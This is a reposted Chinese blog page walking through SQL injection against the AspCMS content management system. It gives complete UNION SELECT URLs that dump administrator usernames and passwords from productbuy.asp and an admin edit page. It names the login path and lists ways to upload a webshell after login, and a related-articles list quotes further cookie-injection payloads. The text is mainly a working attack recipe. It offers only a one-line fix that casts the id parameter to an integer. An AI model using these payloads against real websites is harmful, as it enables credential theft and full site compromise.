aspcms注入 cookies欺骗及修复

最新推荐文章于 2024-04-18 11:03:56 发布
最新推荐文章于 2024-04-18 11:03:56 发布
阅读量259 收藏
点赞数
原文链接:http://www.cnblogs.com/mujj/articles/2722922.html
版权

漏洞出现在
/plug/productbuy.asp
对接收的参数id没有进行过滤而导致的注入漏洞
注入后的页面有跳转,所以要快,建议用快捷键复制
爆用户名
/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1
这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..
爆密码
/plug/productbuy.asp?id=2 union select 1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1
后台登录地址:/admin/login.asp
后台拿shell
1、直接上传.asp;x
2、系统配置信息
3、模版管理新建1.asp模板,内容写马的内容.
修复方法:
id用cint(request(“id”))

问题二:
————————后台注射————————

http://www.hackqing.com/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1

转载于:https://www.cnblogs.com/mujj/articles/2722922.html

weixin_30662109
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
Aspcms 1.5 COOKIES注入0day
积木网络
12-16 937
积木网络注册一个帐号。然后登陆后修改COOKIES的USERID值 在后面加上注入语句: UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins 然后编辑帐号就能看到管理员的帐号和MD5密码值。 后台拿SHELL
1day-AspCMS commentList.asp接口处存在SQL注入漏洞
weixin_43167326的博客
04-18 695
AspCms”是一个开源的内容管理系统(CMS),基于ASP.NET技术开发。它提供了创建和管理网站内容的功能,包括文章、图片、视频等。aspcms具有易用性和灵活性,适用于中小型网站的建设。AspCMS commentList.asp接口处存在SQL注入漏洞,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
aspcms cookies欺骗和后台无验证注入
qq_38807738的博客
06-23 3138
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!————————后台注射———————— http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname...
注入id列表_开源CMS实战渗透测试ASPCMS注入
weixin_39926613的博客
11-27 953
实验等级:中级任务场景:【任务场景】小王在对ASPCMS进行代码审计时,发现ASPCMS的API存在较大的安全问题。在查阅资料后,发现该CMS的逻辑漏洞会导致SQL语句执行漏洞。任务分析:【任务分析】通过阅读源码,找到commentList.asp中的逻辑漏洞。使用处理过的SQL语句执行获取管理员信息,并对其密码进行MD5解密,最终实现盗取管理员账号密码的效果。预备知识:【预备知识】A...
dedecms aspcms_tempfun.php,ASPCMSSQL注入修复(AspCms_ContentFun.asp)
weixin_34766547的博客
03-19 172
'die debugmodedim action : action=getForm("action","get")dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Conten...
ASPCMS DEDE 文章导入 Pbootcms
10-14
aspcms dede 文章导出pbcms
aspcms.rar_aspcms
09-24
aspcms双语企业站,需要的赶紧下载吧,亲测无错
aspcms精美后台登录界面.rar
01-11
aspcms精美后台登录界面。 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设...
aspcms爆后台地址
05-17
aspcms爆后台地址,秒杀老版本,修改后台地址一样能跳到真实地址
【漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 990
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
存在cookie注入南方数据cms
04-24
Windows2008建站不成功,显示不出来,最好用win10吧,win10显示正常
ASPCMS防攻击修改方法.rar
11-25
ASPCMS是很好的开源建站系统,有着小灵快的特点利于SEO,但是很容易被攻击,介绍一下默认路径修改防攻击方法,不用修补漏洞,直接修改程序路径即可。
aspcms 程序漏洞 注入+ cookies欺骗
weixin_30483013的博客
03-26 458
漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,2...
复现 ASPCMS企业建站系统Cookies欺骗漏洞
记录并分享学习安全的知识点..
08-21 811
ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 ASPCMS2.0存在sql注入注入漏洞,可获得admin管理员用户的cookie值。
aspcms投票系统后台插马漏洞
收集盒 Book box
12-21 2282
发布日期:2012-12-12 发布作者:月末 漏洞类型:设计错误 漏洞描述:后台配置文件采用文件写入,未严格过滤导致插入一句话木马。   config.asp内容 %Const SiteName="ASPCMS 开源投票系统 V1.0"             Const ks="0"                         Const xxps="1"
cookies欺骗(bugku-web)
小白的劝退之路
04-30 274
ESPCMS最新cookie注入漏洞分析
代码析构师的专栏
05-12 834
0×00  简介: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。 0×01  漏洞分析: function in_list() { parent::start_pagetemplate(); $lng = (admin_LNG
《WEB安全渗透测试》(8)SQL注入实战:cookie注入
午夜安全
10-24 1146
《WEB安全渗透测试》(8)SQL注入实战:cookie注入 在这个URL里没有发现参数,使用Burp抓取数据后,发现cookie里存在数据。1)判断是否存在注入在cookie里依次做如下修改:id=1’,id=1 and 1=1,id=1 and 1=2结果如下,说明存在SQL注入漏洞。2)查询字段数量判断出字段数量是:3。查询SQL语句插入位置。3)查询数据库库名(1)查询当前数据库库名(2)查询所有数据库库名像这样,构造不同的union注入语句......
cmsv6 sql注入漏洞
最新发布
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值